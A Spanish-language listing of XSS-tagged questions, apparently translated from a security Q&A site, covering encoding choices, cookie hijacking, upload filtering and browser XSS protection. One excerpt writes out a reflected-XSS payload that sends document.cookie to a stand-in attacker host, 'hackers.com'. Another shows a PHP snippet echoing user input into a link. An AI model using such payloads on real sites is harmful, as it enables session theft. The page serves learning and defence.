Preguntas con etiqueta 'xss'

preguntas con etiqueta
1
respuesta

URLEncode vs HTMLEncode para la prevención XSS

Tengo un proyecto (en Java) que el programador utilizó URLEncode para generar contenido como parte de HTML en lugar de HTMLEncode. ¿Cuál es el riesgo de que XSS sea vulnerable? (Olvidemos que es una codificación diferente y que obtendrá resul...
hecha 14.11.2011 - 09:24
5
respuestas

está convirtiendo '' a '<' ¿Es suficiente para evitar la ejecución de JavaScript desde HTML arbitrario?

Esta es una especie de pregunta de apuesta. Un conocido mío ha afirmado que, dado un globo arbitrario de HTML, se puede evitar que completamente se ejecute JavaScript si, antes de incluirlo en una página web, reemplaza todas las instancias de...
hecha 26.11.2014 - 03:45
1
respuesta

¿Hay alguna posibilidad de eludir el auditor de Chrome xss en este caso?

Acabo de expirar con xss en mi propio servidor. Escribí un código como este: <?php if (isset($_POST['data'])) { echo "<a href='".htmlentities($_POST['data'])."'>Click Here</a><br/>"; } ?> Aquí hay un...
hecha 13.02.2017 - 20:09
1
respuesta

XSS dentro de CSS cuando "está codificado?

Estoy tratando de hacer que XSS funcione en un sitio. Me permite editar CSS, que luego se incluye dentro de la fuente de la página web, pero no me permite usar ", solo '. La fuente es así: body { margin: 0; padding: 0; background-color:...
hecha 04.09.2012 - 22:24
4
respuestas

XSS por robar cookies ... ¿ya no?

El otro día encontré una vulnerabilidad de XSS en un sitio web que un amigo me dijo a Pentest. Era una página de una escuela que está administrando, así que lo importante aquí son las credenciales de inicio de sesión == COOKIES. En esta prueb...
hecha 10.08.2015 - 05:29
4
respuestas

Sugerencias para evitar el secuestro de cookies en una aplicación web

He estado desarrollando aplicaciones web desde hace bastante tiempo. Al crear sitios web, la función "Recordarme" es una de las funciones más triviales (leer como imprescindible para los clientes) que se implementarán. Hasta hoy, solo estaba usa...
hecha 15.05.2014 - 08:53
1
respuesta

Ataque XSS reflejado mediante solicitud POST y carga útil XML

Sé que un XSS reflejado se puede hacer con una solicitud GET como: http://site.com?search=<script>location.href='http://hackers.com?sessionToken='+document.cookie;</script> Mientras la respuesta se vea similar a esto: <html...
hecha 15.09.2013 - 22:30
2
respuestas

Cómo garantizar que los archivos cargados por los usuarios no contengan ningún código XSS

He estado trabajando para proporcionar la seguridad relacionada con los ataques XSS. Mi sitio web solo permite los siguientes tipos de mimo: XML, CSV, HTML, PLAIN, VND_WAP_WML, APPLICATION_ZIP, APPLICATION_PDF, APPLICATION_VND_FDF, APPLICA...
hecha 15.07.2013 - 10:32
2
respuestas

¿Para qué tipos de contenido se recomienda configurar el encabezado X-XSS-Protection?

Probablemente, uno pueda sugerir establecer este encabezado para todas las respuestas de un servidor web (estoy pensando en value="1; mode = block"). Sin embargo, ¿tiene sentido configurarlo al servir imágenes, por ejemplo? Archivos CSS? ¿Res...
hecha 09.02.2017 - 19:22
1
respuesta

¿Cuáles son las medidas de seguridad tomadas en los sitios web que permiten las secuencias de comandos en línea como jsfiddle y codepen?

Tal como se pregunta en el título, me he estado preguntando esto por un tiempo. Estos sitios permiten al usuario escribir scripts y almacenarlos también. ¿No son vulnerables a ataques como los scripts entre sitios o cualquier otro ataque similar...
hecha 09.11.2017 - 02:26